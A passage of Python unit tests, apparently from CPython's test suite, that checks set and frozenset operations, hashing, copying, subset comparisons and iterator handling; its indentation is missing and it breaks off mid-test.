self.assertEqual(self.s, dup)
self.assertNotEqual(id(self.s), id(dup))
self.assertEqual(type(dup), self.basetype)
def test_add(self):
self.s.add('Q')
self.assertIn('Q', self.s)
dup = self.s.copy()
self.s.add('Q')
self.assertEqual(self.s, dup)
self.assertRaises(TypeError, self.s.add, [])
def test_remove(self):
self.s.remove('a')
self.assertNotIn('a', self.s)
self.assertRaises(KeyError, self.s.remove, 'Q')
self.assertRaises(TypeError, self.s.remove, [])
s = self.thetype([frozenset(self.word)])
self.assertIn(self.thetype(self.word), s)
s.remove(self.thetype(self.word))
self.assertNotIn(self.thetype(self.word), s)
self.assertRaises(KeyError, self.s.remove, self.thetype(self.word))
def test_remove_keyerror_unpacking(self):
# bug: www.python.org/sf/1576657
for v1 in ['Q', (1,)]:
try:
self.s.remove(v1)
except KeyError as e:
v2 = e.args[0]
self.assertEqual(v1, v2)
else:
self.fail()
def test_remove_keyerror_set(self):
key = self.thetype([3, 4])
try:
self.s.remove(key)
except KeyError as e:
self.assertTrue(e.args[0] is key,
"KeyError should be {0}, not {1}".format(key,
e.args[0]))
else:
self.fail()
def test_discard(self):
self.s.discard('a')
self.assertNotIn('a', self.s)
self.s.discard('Q')
self.assertRaises(TypeError, self.s.discard, [])
s = self.thetype([frozenset(self.word)])
self.assertIn(self.thetype(self.word), s)
s.discard(self.thetype(self.word))
self.assertNotIn(self.thetype(self.word), s)
s.discard(self.thetype(self.word))
def test_pop(self):
for i in range(len(self.s)):
elem = self.s.pop()
self.assertNotIn(elem, self.s)
self.assertRaises(KeyError, self.s.pop)
def test_update(self):
retval = self.s.update(self.otherword)
self.assertEqual(retval, None)
for c in (self.word + self.otherword):
self.assertIn(c, self.s)
self.assertRaises(PassThru, self.s.update, check_pass_thru())
self.assertRaises(TypeError, self.s.update, [[]])
for p, q in (('cdc', 'abcd'), ('efgfe', 'abcefg'), ('ccb', 'abc'), ('ef', 'abcef')):
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.update(C(p)), None)
self.assertEqual(s, set(q))
for p in ('cdc', 'efgfe', 'ccb', 'ef', 'abcda'):
q = 'ahi'
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.update(C(p), C(q)), None)
self.assertEqual(s, set(s) | set(p) | set(q))
def test_ior(self):
self.s |= set(self.otherword)
for c in (self.word + self.otherword):
self.assertIn(c, self.s)
def test_intersection_update(self):
retval = self.s.intersection_update(self.otherword)
self.assertEqual(retval, None)
for c in (self.word + self.otherword):
if c in self.otherword and c in self.word:
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
self.assertRaises(PassThru, self.s.intersection_update, check_pass_thru())
self.assertRaises(TypeError, self.s.intersection_update, [[]])
for p, q in (('cdc', 'c'), ('efgfe', ''), ('ccb', 'bc'), ('ef', '')):
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.intersection_update(C(p)), None)
self.assertEqual(s, set(q))
ss = 'abcba'
s = self.thetype(ss)
t = 'cbc'
self.assertEqual(s.intersection_update(C(p), C(t)), None)
self.assertEqual(s, set('abcba')&set(p)&set(t))
def test_iand(self):
self.s &= set(self.otherword)
for c in (self.word + self.otherword):
if c in self.otherword and c in self.word:
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
def test_difference_update(self):
retval = self.s.difference_update(self.otherword)
self.assertEqual(retval, None)
for c in (self.word + self.otherword):
if c in self.word and c not in self.otherword:
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
self.assertRaises(PassThru, self.s.difference_update, check_pass_thru())
self.assertRaises(TypeError, self.s.difference_update, [[]])
self.assertRaises(TypeError, self.s.symmetric_difference_update, [[]])
for p, q in (('cdc', 'ab'), ('efgfe', 'abc'), ('ccb', 'a'), ('ef', 'abc')):
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.difference_update(C(p)), None)
self.assertEqual(s, set(q))
s = self.thetype('abcdefghih')
s.difference_update()
self.assertEqual(s, self.thetype('abcdefghih'))
s = self.thetype('abcdefghih')
s.difference_update(C('aba'))
self.assertEqual(s, self.thetype('cdefghih'))
s = self.thetype('abcdefghih')
s.difference_update(C('cdc'), C('aba'))
self.assertEqual(s, self.thetype('efghih'))
def test_isub(self):
self.s -= set(self.otherword)
for c in (self.word + self.otherword):
if c in self.word and c not in self.otherword:
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
def test_symmetric_difference_update(self):
retval = self.s.symmetric_difference_update(self.otherword)
self.assertEqual(retval, None)
for c in (self.word + self.otherword):
if (c in self.word) ^ (c in self.otherword):
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
self.assertRaises(PassThru, self.s.symmetric_difference_update, check_pass_thru())
self.assertRaises(TypeError, self.s.symmetric_difference_update, [[]])
for p, q in (('cdc', 'abd'), ('efgfe', 'abcefg'), ('ccb', 'a'), ('ef', 'abcef')):
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.symmetric_difference_update(C(p)), None)
self.assertEqual(s, set(q))
def test_ixor(self):
self.s ^= set(self.otherword)
for c in (self.word + self.otherword):
if (c in self.word) ^ (c in self.otherword):
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
def test_inplace_on_self(self):
t = self.s.copy()
t |= t
self.assertEqual(t, self.s)
t &= t
self.assertEqual(t, self.s)
t -= t
self.assertEqual(t, self.thetype())
t = self.s.copy()
t ^= t
self.assertEqual(t, self.thetype())
def test_weakref(self):
s = self.thetype('gallahad')
p = weakref.proxy(s)
self.assertEqual(str(p), str(s))
s = None
self.assertRaises(ReferenceError, str, p)
def test_rich_compare(self):
class TestRichSetCompare:
def __gt__(self, some_set):
self.gt_called = True
return False
def __lt__(self, some_set):
self.lt_called = True
return False
def __ge__(self, some_set):
self.ge_called = True
return False
def __le__(self, some_set):
self.le_called = True
return False
# This first tries the builtin rich set comparison, which doesn't know
# how to handle the custom object. Upon returning NotImplemented, the
# corresponding comparison on the right object is invoked.
myset = {1, 2, 3}
myobj = TestRichSetCompare()
myset < myobj
self.assertTrue(myobj.gt_called)
myobj = TestRichSetCompare()
myset > myobj
self.assertTrue(myobj.lt_called)
myobj = TestRichSetCompare()
myset <= myobj
self.assertTrue(myobj.ge_called)
myobj = TestRichSetCompare()
myset >= myobj
self.assertTrue(myobj.le_called)
@unittest.skipUnless(hasattr(set, "test_c_api"),
'C API test only available in a debug build')
def test_c_api(self):
self.assertEqual(set().test_c_api(), True)
class SetSubclass(set):
pass
class TestSetSubclass(TestSet):
thetype = SetSubclass
basetype = set
class SetSubclassWithKeywordArgs(set):
def __init__(self, iterable=[], newarg=None):
set.__init__(self, iterable)
class TestSetSubclassWithKeywordArgs(TestSet):
def test_keywords_in_subclass(self):
'SF bug #1486663 -- this used to erroneously raise a TypeError'
SetSubclassWithKeywordArgs(newarg=1)
class TestFrozenSet(TestJointOps, unittest.TestCase):
thetype = frozenset
basetype = frozenset
def test_init(self):
s = self.thetype(self.word)
s.__init__(self.otherword)
self.assertEqual(s, set(self.word))
def test_singleton_empty_frozenset(self):
f = frozenset()
efs = [frozenset(), frozenset([]), frozenset(()), frozenset(''),
frozenset(), frozenset([]), frozenset(()), frozenset(''),
frozenset(range(0)), frozenset(frozenset()),
frozenset(f), f]
# All of the empty frozensets should have just one id()
self.assertEqual(len(set(map(id, efs))), 1)
def test_constructor_identity(self):
s = self.thetype(range(3))
t = self.thetype(s)
self.assertEqual(id(s), id(t))
def test_hash(self):
self.assertEqual(hash(self.thetype('abcdeb')),
hash(self.thetype('ebecda')))
# make sure that all permutations give the same hash value
n = 100
seq = [randrange(n) for i in range(n)]
results = set()
for i in range(200):
shuffle(seq)
results.add(hash(self.thetype(seq)))
self.assertEqual(len(results), 1)
def test_copy(self):
dup = self.s.copy()
self.assertEqual(id(self.s), id(dup))
def test_frozen_as_dictkey(self):
seq = list(range(10)) + list('abcdefg') + ['apple']
key1 = self.thetype(seq)
key2 = self.thetype(reversed(seq))
self.assertEqual(key1, key2)
self.assertNotEqual(id(key1), id(key2))
d = {}
d[key1] = 42
self.assertEqual(d[key2], 42)
def test_hash_caching(self):
f = self.thetype('abcdcda')
self.assertEqual(hash(f), hash(f))
def test_hash_effectiveness(self):
n = 13
hashvalues = set()
addhashvalue = hashvalues.add
elemmasks = [(i+1, 1<<i) for i in range(n)]
for i in range(2**n):
addhashvalue(hash(frozenset([e for e, m in elemmasks if m&i])))
self.assertEqual(len(hashvalues), 2**n)
class FrozenSetSubclass(frozenset):
pass
class TestFrozenSetSubclass(TestFrozenSet):
thetype = FrozenSetSubclass
basetype = frozenset
def test_constructor_identity(self):
s = self.thetype(range(3))
t = self.thetype(s)
self.assertNotEqual(id(s), id(t))
def test_copy(self):
dup = self.s.copy()
self.assertNotEqual(id(self.s), id(dup))
def test_nested_empty_constructor(self):
s = self.thetype()
t = self.thetype(s)
self.assertEqual(s, t)
def test_singleton_empty_frozenset(self):
Frozenset = self.thetype
f = frozenset()
F = Frozenset()
efs = [Frozenset(), Frozenset([]), Frozenset(()), Frozenset(''),
Frozenset(), Frozenset([]), Frozenset(()), Frozenset(''),
Frozenset(range(0)), Frozenset(Frozenset()),
Frozenset(frozenset()), f, F, Frozenset(f), Frozenset(F)]
# All empty frozenset subclass instances should have different ids
self.assertEqual(len(set(map(id, efs))), len(efs))
# Tests taken from test_sets.py =============================================
empty_set = set()
#==============================================================================
class TestBasicOps:
def test_repr(self):
if self.repr is not None:
self.assertEqual(repr(self.set), self.repr)
def check_repr_against_values(self):
text = repr(self.set)
self.assertTrue(text.startswith('{'))
self.assertTrue(text.endswith('}'))
result = text[1:-1].split(', ')
result.sort()
sorted_repr_values = [repr(value) for value in self.values]
sorted_repr_values.sort()
self.assertEqual(result, sorted_repr_values)
def test_print(self):
try:
fo = open(support.TESTFN, "w")
fo.write(str(self.set))
fo.close()
fo = open(support.TESTFN, "r")
self.assertEqual(fo.read(), repr(self.set))
finally:
fo.close()
support.unlink(support.TESTFN)
def test_length(self):
self.assertEqual(len(self.set), self.length)
def test_self_equality(self):
self.assertEqual(self.set, self.set)
def test_equivalent_equality(self):
self.assertEqual(self.set, self.dup)
def test_copy(self):
self.assertEqual(self.set.copy(), self.dup)
def test_self_union(self):
result = self.set | self.set
self.assertEqual(result, self.dup)
def test_empty_union(self):
result = self.set | empty_set
self.assertEqual(result, self.dup)
def test_union_empty(self):
result = empty_set | self.set
self.assertEqual(result, self.dup)
def test_self_intersection(self):
result = self.set & self.set
self.assertEqual(result, self.dup)
def test_empty_intersection(self):
result = self.set & empty_set
self.assertEqual(result, empty_set)
def test_intersection_empty(self):
result = empty_set & self.set
self.assertEqual(result, empty_set)
def test_self_isdisjoint(self):
result = self.set.isdisjoint(self.set)
self.assertEqual(result, not self.set)
def test_empty_isdisjoint(self):
result = self.set.isdisjoint(empty_set)
self.assertEqual(result, True)
def test_isdisjoint_empty(self):
result = empty_set.isdisjoint(self.set)
self.assertEqual(result, True)
def test_self_symmetric_difference(self):
result = self.set ^ self.set
self.assertEqual(result, empty_set)
def test_empty_symmetric_difference(self):
result = self.set ^ empty_set
self.assertEqual(result, self.set)
def test_self_difference(self):
result = self.set - self.set
self.assertEqual(result, empty_set)
def test_empty_difference(self):
result = self.set - empty_set
self.assertEqual(result, self.dup)
def test_empty_difference_rev(self):
result = empty_set - self.set
self.assertEqual(result, empty_set)
def test_iteration(self):
for v in self.set:
self.assertIn(v, self.values)
setiter = iter(self.set)
self.assertEqual(setiter.__length_hint__(), len(self.set))
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
p = pickle.dumps(self.set, proto)
copy = pickle.loads(p)
self.assertEqual(self.set, copy,
"%s != %s" % (self.set, copy))
#------------------------------------------------------------------------------
class TestBasicOpsEmpty(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "empty set"
self.values = []
self.set = set(self.values)
self.dup = set(self.values)
self.length = 0
self.repr = "set()"
#------------------------------------------------------------------------------
class TestBasicOpsSingleton(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "unit set (number)"
self.values = [3]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 1
self.repr = "{3}"
def test_in(self):
self.assertIn(3, self.set)
def test_not_in(self):
self.assertNotIn(2, self.set)
#------------------------------------------------------------------------------
class TestBasicOpsTuple(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "unit set (tuple)"
self.values = [(0, "zero")]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 1
self.repr = "{(0, 'zero')}"
def test_in(self):
self.assertIn((0, "zero"), self.set)
def test_not_in(self):
self.assertNotIn(9, self.set)
#------------------------------------------------------------------------------
class TestBasicOpsTriple(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "triple set"
self.values = [0, "zero", operator.add]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 3
self.repr = None
#------------------------------------------------------------------------------
class TestBasicOpsString(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "string set"
self.values = ["a", "b", "c"]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 3
def test_repr(self):
self.check_repr_against_values()
#------------------------------------------------------------------------------
class TestBasicOpsBytes(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "bytes set"
self.values = [b"a", b"b", b"c"]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 3
def test_repr(self):
self.check_repr_against_values()
#------------------------------------------------------------------------------
class TestBasicOpsMixedStringBytes(TestBasicOps, unittest.TestCase):
def setUp(self):
self._warning_filters = support.check_warnings()
self._warning_filters.__enter__()
warnings.simplefilter('ignore', BytesWarning)
self.case = "string and bytes set"
self.values = ["a", "b", b"a", b"b"]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 4
def tearDown(self):
self._warning_filters.__exit__(None, None, None)
def test_repr(self):
self.check_repr_against_values()
#==============================================================================
def baditer():
raise TypeError
yield True
def gooditer():
yield True
class TestExceptionPropagation(unittest.TestCase):
"""SF 628246: Set constructor should not trap iterator TypeErrors"""
def test_instanceWithException(self):
self.assertRaises(TypeError, set, baditer())
def test_instancesWithoutException(self):
# All of these iterables should load without exception.
set([1,2,3])
set((1,2,3))
set({'one':1, 'two':2, 'three':3})
set(range(3))
set('abc')
set(gooditer())
def test_changingSizeWhileIterating(self):
s = set([1,2,3])
try:
for i in s:
s.update([4])
except RuntimeError:
pass
else:
self.fail("no exception when changing size during iteration")
#==============================================================================
class TestSetOfSets(unittest.TestCase):
def test_constructor(self):
inner = frozenset([1])
outer = set([inner])
element = outer.pop()
self.assertEqual(type(element), frozenset)
outer.add(inner) # Rebuild set of sets with .add method
outer.remove(inner)
self.assertEqual(outer, set()) # Verify that remove worked
outer.discard(inner) # Absence of KeyError indicates working fine
#==============================================================================
class TestBinaryOps(unittest.TestCase):
def setUp(self):
self.set = set((2, 4, 6))
def test_eq(self): # SF bug 643115
self.assertEqual(self.set, set({2:1,4:3,6:5}))
def test_union_subset(self):
result = self.set | set([2])
self.assertEqual(result, set((2, 4, 6)))
def test_union_superset(self):
result = self.set | set([2, 4, 6, 8])
self.assertEqual(result, set([2, 4, 6, 8]))
def test_union_overlap(self):
result = self.set | set([3, 4, 5])
self.assertEqual(result, set([2, 3, 4, 5, 6]))
def test_union_non_overlap(self):
result = self.set | set([8])
self.assertEqual(result, set([2, 4, 6, 8]))
def test_intersection_subset(self):
result = self.set & set((2, 4))
self.assertEqual(result, set((2, 4)))
def test_intersection_superset(self):
result = self.set & set([2, 4, 6, 8])
self.assertEqual(result, set([2, 4, 6]))
def test_intersection_overlap(self):
result = self.set & set([3, 4, 5])
self.assertEqual(result, set([4]))
def test_intersection_non_overlap(self):
result = self.set & set([8])
self.assertEqual(result, empty_set)
def test_isdisjoint_subset(self):
result = self.set.isdisjoint(set((2, 4)))
self.assertEqual(result, False)
def test_isdisjoint_superset(self):
result = self.set.isdisjoint(set([2, 4, 6, 8]))
self.assertEqual(result, False)
def test_isdisjoint_overlap(self):
result = self.set.isdisjoint(set([3, 4, 5]))
self.assertEqual(result, False)
def test_isdisjoint_non_overlap(self):
result = self.set.isdisjoint(set([8]))
self.assertEqual(result, True)
def test_sym_difference_subset(self):
result = self.set ^ set((2, 4))
self.assertEqual(result, set([6]))
def test_sym_difference_superset(self):
result = self.set ^ set((2, 4, 6, 8))
self.assertEqual(result, set([8]))
def test_sym_difference_overlap(self):
result = self.set ^ set((3, 4, 5))
self.assertEqual(result, set([2, 3, 5, 6]))
def test_sym_difference_non_overlap(self):
result = self.set ^ set([8])
self.assertEqual(result, set([2, 4, 6, 8]))
#==============================================================================
class TestUpdateOps(unittest.TestCase):
def setUp(self):
self.set = set((2, 4, 6))
def test_union_subset(self):
self.set |= set([2])
self.assertEqual(self.set, set((2, 4, 6)))
def test_union_superset(self):
self.set |= set([2, 4, 6, 8])
self.assertEqual(self.set, set([2, 4, 6, 8]))
def test_union_overlap(self):
self.set |= set([3, 4, 5])
self.assertEqual(self.set, set([2, 3, 4, 5, 6]))
def test_union_non_overlap(self):
self.set |= set([8])
self.assertEqual(self.set, set([2, 4, 6, 8]))
def test_union_method_call(self):
self.set.update(set([3, 4, 5]))
self.assertEqual(self.set, set([2, 3, 4, 5, 6]))
def test_intersection_subset(self):
self.set &= set((2, 4))
self.assertEqual(self.set, set((2, 4)))
def test_intersection_superset(self):
self.set &= set([2, 4, 6, 8])
self.assertEqual(self.set, set([2, 4, 6]))
def test_intersection_overlap(self):
self.set &= set([3, 4, 5])
self.assertEqual(self.set, set([4]))
def test_intersection_non_overlap(self):
self.set &= set([8])
self.assertEqual(self.set, empty_set)
def test_intersection_method_call(self):
self.set.intersection_update(set([3, 4, 5]))
self.assertEqual(self.set, set([4]))
def test_sym_difference_subset(self):
self.set ^= set((2, 4))
self.assertEqual(self.set, set([6]))
def test_sym_difference_superset(self):
self.set ^= set((2, 4, 6, 8))
self.assertEqual(self.set, set([8]))
def test_sym_difference_overlap(self):
self.set ^= set((3, 4, 5))
self.assertEqual(self.set, set([2, 3, 5, 6]))
def test_sym_difference_non_overlap(self):
self.set ^= set([8])
self.assertEqual(self.set, set([2, 4, 6, 8]))
def test_sym_difference_method_call(self):
self.set.symmetric_difference_update(set([3, 4, 5]))
self.assertEqual(self.set, set([2, 3, 5, 6]))
def test_difference_subset(self):
self.set -= set((2, 4))
self.assertEqual(self.set, set([6]))
def test_difference_superset(self):
self.set -= set((2, 4, 6, 8))
self.assertEqual(self.set, set([]))
def test_difference_overlap(self):
self.set -= set((3, 4, 5))
self.assertEqual(self.set, set([2, 6]))
def test_difference_non_overlap(self):
self.set -= set([8])
self.assertEqual(self.set, set([2, 4, 6]))
def test_difference_method_call(self):
self.set.difference_update(set([3, 4, 5]))
self.assertEqual(self.set, set([2, 6]))
#==============================================================================
class TestMutate(unittest.TestCase):
def setUp(self):
self.values = ["a", "b", "c"]
self.set = set(self.values)
def test_add_present(self):
self.set.add("c")
self.assertEqual(self.set, set("abc"))
def test_add_absent(self):
self.set.add("d")
self.assertEqual(self.set, set("abcd"))
def test_add_until_full(self):
tmp = set()
expected_len = 0
for v in self.values:
tmp.add(v)
expected_len += 1
self.assertEqual(len(tmp), expected_len)
self.assertEqual(tmp, self.set)
def test_remove_present(self):
self.set.remove("b")
self.assertEqual(self.set, set("ac"))
def test_remove_absent(self):
try:
self.set.remove("d")
self.fail("Removing missing element should have raised LookupError")
except LookupError:
pass
def test_remove_until_empty(self):
expected_len = len(self.set)
for v in self.values:
self.set.remove(v)
expected_len -= 1
self.assertEqual(len(self.set), expected_len)
def test_discard_present(self):
self.set.discard("c")
self.assertEqual(self.set, set("ab"))
def test_discard_absent(self):
self.set.discard("d")
self.assertEqual(self.set, set("abc"))
def test_clear(self):
self.set.clear()
self.assertEqual(len(self.set), 0)
def test_pop(self):
popped = {}
while self.set:
popped[self.set.pop()] = None
self.assertEqual(len(popped), len(self.values))
for v in self.values:
self.assertIn(v, popped)
def test_update_empty_tuple(self):
self.set.update(())
self.assertEqual(self.set, set(self.values))
def test_update_unit_tuple_overlap(self):
self.set.update(("a",))
self.assertEqual(self.set, set(self.values))
def test_update_unit_tuple_non_overlap(self):
self.set.update(("a", "z"))
self.assertEqual(self.set, set(self.values + ["z"]))
#==============================================================================
class TestSubsets:
case2method = {"<=": "issubset",
">=": "issuperset",
}
reverse = {"==": "==",
"!=": "!=",
"<": ">",
">": "<",
"<=": ">=",
">=": "<=",
}
def test_issubset(self):
x = self.left
y = self.right
for case in "!=", "==", "<", "<=", ">", ">=":
expected = case in self.cases
# Test the binary infix spelling.
result = eval("x" + case + "y", locals())
self.assertEqual(result, expected)
# Test the "friendly" method-name spelling, if one exists.
if case in TestSubsets.case2method:
method = getattr(x, TestSubsets.case2method[case])
result = method(y)
self.assertEqual(result, expected)
# Now do the same for the operands reversed.
rcase = TestSubsets.reverse[case]
result = eval("y" + rcase + "x", locals())
self.assertEqual(result, expected)
if rcase in TestSubsets.case2method:
method = getattr(y, TestSubsets.case2method[rcase])
result = method(x)
self.assertEqual(result, expected)
#------------------------------------------------------------------------------
class TestSubsetEqualEmpty(TestSubsets, unittest.TestCase):
left = set()
right = set()
name = "both empty"
cases = "==", "<=", ">="
#------------------------------------------------------------------------------
class TestSubsetEqualNonEmpty(TestSubsets, unittest.TestCase):
left = set([1, 2])
right = set([1, 2])
name = "equal pair"
cases = "==", "<=", ">="
#------------------------------------------------------------------------------
class TestSubsetEmptyNonEmpty(TestSubsets, unittest.TestCase):
left = set()
right = set([1, 2])
name = "one empty, one non-empty"
cases = "!=", "<", "<="
#------------------------------------------------------------------------------
class TestSubsetPartial(TestSubsets, unittest.TestCase):
left = set([1])
right = set([1, 2])
name = "one a non-empty proper subset of other"
cases = "!=", "<", "<="
#------------------------------------------------------------------------------
class TestSubsetNonOverlap(TestSubsets, unittest.TestCase):
left = set([1])
right = set([2])
name = "neither empty, neither contains"
cases = "!="
#==============================================================================
class TestOnlySetsInBinaryOps:
def test_eq_ne(self):
# Unlike the others, this is testing that == and != *are* allowed.
self.assertEqual(self.other == self.set, False)
self.assertEqual(self.set == self.other, False)
self.assertEqual(self.other != self.set, True)
self.assertEqual(self.set != self.other, True)
def test_ge_gt_le_lt(self):
self.assertRaises(TypeError, lambda: self.set < self.other)
self.assertRaises(TypeError, lambda: self.set <= self.other)
self.assertRaises(TypeError, lambda: self.set > self.other)
self.assertRaises(TypeError, lambda: self.set >= self.other)
self.assertRaises(TypeError, lambda: self.other < self.set)
self.assertRaises(TypeError, lambda: self.other <= self.set)
self.assertRaises(TypeError, lambda: self.other > self.set)
self.assertRaises(TypeError, lambda: self.other >= self.set)
def test_update_operator(self):
try:
self.set |= self.other
except TypeError:
pass
else:
self.fail("expected TypeError")
def test_update(self):
if self.otherIsIterable:
self.set.update(self.other)
else:
self.assertRaises(TypeError, self.set.update, self.other)
def test_union(self):
self.assertRaises(TypeError, lambda: self.set | self.other)
self.assertRaises(TypeError, lambda: self.other | self.set)
if self.otherIsIterable:
self.set.union(self.other)
else:
self.assertRaises(TypeError, self.set.union, self.other)
def test_intersection_update_operator(self):
try:
self.set &= self.other
except TypeError:
pass
else:
self.fail("expected TypeError")
def test_intersection_update(self):
if self.otherIsIterable:
self.set.intersection_update(self.other)
else:
self.assertRaises(TypeError,
self.set.intersection_update,
self.other)
def test_intersection(self):
self.assertRaises(TypeError, lambda: self.set & self.other)
self.assertRaises(TypeError, lambda: self.other & self.set)
if self.otherIsIterable:
self.set.intersection(self.other)
else:
self.assertRaises(TypeError, self.set.intersection, self.other)
def test_sym_difference_update_operator(self):
try:
self.set ^= self.other
except TypeError:
pass
else:
self.fail("expected TypeError")
def test_sym_difference_update(self):
if self.otherIsIterable:
self.set.symmetric_difference_update(self.other)
else:
self.assertRaises(TypeError,
self.set.symmetric_difference_update,
self.other)
def test_sym_difference(self):
self.assertRaises(TypeError, lambda: self.set ^ self.other)
self.assertRaises(TypeError, lambda: self.other ^ self.set)
if self.otherIsIterable:
self.set.symmetric_difference(self.other)
else:
self.assertRaises(TypeError, self.set.symmetric_difference, self.other)
def test_difference_update_operator(self):
try:
self.set -= self.other
except TypeError:
pass
else:
self.fail("expected TypeError")
def test_difference_update(self):
if self.otherIsIterable:
self.set.difference_update(self.other)
else:
self.assertRaises(TypeError,
self.set.difference_update,
self.other)
def test_difference(self):
self.assertRaises(TypeError, lambda: self.set - self.other)
self.assertRaises(TypeError, lambda: self.other - self.set)
if self.otherIsIterable:
self.set.difference(self.other)
else:
self.assertRaises(TypeError, self.set.difference, self.other)
#------------------------------------------------------------------------------
class TestOnlySetsNumeric(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = 19
self.otherIsIterable = False
#------------------------------------------------------------------------------
class TestOnlySetsDict(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = {1:2, 3:4}
self.otherIsIterable = True
#------------------------------------------------------------------------------
class TestOnlySetsOperator(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = operator.add
self.otherIsIterable = False
#------------------------------------------------------------------------------
class TestOnlySetsTuple(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = (2, 4, 6)
self.otherIsIterable = True
#------------------------------------------------------------------------------
class TestOnlySetsString(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = 'abc'
self.otherIsIterable = True
#------------------------------------------------------------------------------
class TestOnlySetsGenerator(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
def gen():
for i in range(0, 10, 2):
yield i
self.set = set((1, 2, 3))
self.other = gen()
self.otherIsIterable = True
#==============================================================================
class TestCopying:
def test_copy(self):
dup = self.set.copy()
dup_list = sorted(dup, key=repr)
set_list = sorted(self.set, key=repr)
self.assertEqual(len(dup_list), len(set_list))
for i in range(len(dup_list)):
self.assertTrue(dup_list[i] is set_list[i])
def test_deep_copy(self):
dup = copy.deepcopy(self.set)
##print type(dup), repr(dup)
dup_list = sorted(dup, key=repr)
set_list = sorted(self.set, key=repr)
self.assertEqual(len(dup_list), len(set_list))
for i in range(len(dup_list)):
self.assertEqual(dup_list[i], set_list[i])
#------------------------------------------------------------------------------
class TestCopyingEmpty(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set()
#------------------------------------------------------------------------------
class TestCopyingSingleton(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set(["hello"])
#------------------------------------------------------------------------------
class TestCopyingTriple(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set(["zero", 0, None])
#------------------------------------------------------------------------------
class TestCopyingTuple(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set([(1, 2)])
#------------------------------------------------------------------------------
class TestCopyingNested(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set([((1, 2), (3, 4))])
#==============================================================================
class TestIdentities(unittest.TestCase):
def setUp(self):
self.a = set('abracadabra')
self.b = set('alacazam')
def test_binopsVsSubsets(self):
a, b = self.a, self.b
self.assertTrue(a - b < a)
self.assertTrue(b - a < b)
self.assertTrue(a & b < a)
self.assertTrue(a & b < b)
self.assertTrue(a | b > a)
self.assertTrue(a | b > b)
self.assertTrue(a ^ b < a | b)
def test_commutativity(self):
a, b = self.a, self.b
self.assertEqual(a&b, b&a)
self.assertEqual(a|b, b|a)
self.assertEqual(a^b, b^a)
if a != b:
self.assertNotEqual(a-b, b-a)
def test_summations(self):
# check that sums of parts equal the whole
a, b = self.a, self.b
self.assertEqual((a-b)|(a&b)|(b-a), a|b)
self.assertEqual((a&b)|(a^b), a|b)
self.assertEqual(a|(b-a), a|b)
self.assertEqual((a-b)|b, a|b)
self.assertEqual((a-b)|(a&b), a)
self.assertEqual((b-a)|(a&b), b)
self.assertEqual((a-b)|(b-a), a^b)
def test_exclusion(self):
# check that inverse operations show non-overlap
a, b, zero = self.a, self.b, set()
self.assertEqual((a-b)&b, zero)
self.assertEqual((b-a)&a, zero)
self.assertEqual((a&b)&(a^b), zero)
# Tests derived from test_itertools.py =======================================
def R(seqn):
'Regular generator'
for i in seqn:
yield i
class G:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class I:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class Ig:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class X:
'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class N:
'Iterator missing __next__()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class E:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
3 // 0
class S:
'Test immediate stop'
def __init__(self, seqn):
pass
def __iter__(self):
return self
def __next__(self):
raise StopIteration
from itertools import chain
def L(seqn):
'Test multiple tiers of iterators'
return chain(map(lambda x:x, R(Ig(G(seqn)))))
class TestVariousIteratorArgs(unittest.TestCase):
def test_constructor(self):
for cons in (set, frozenset):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
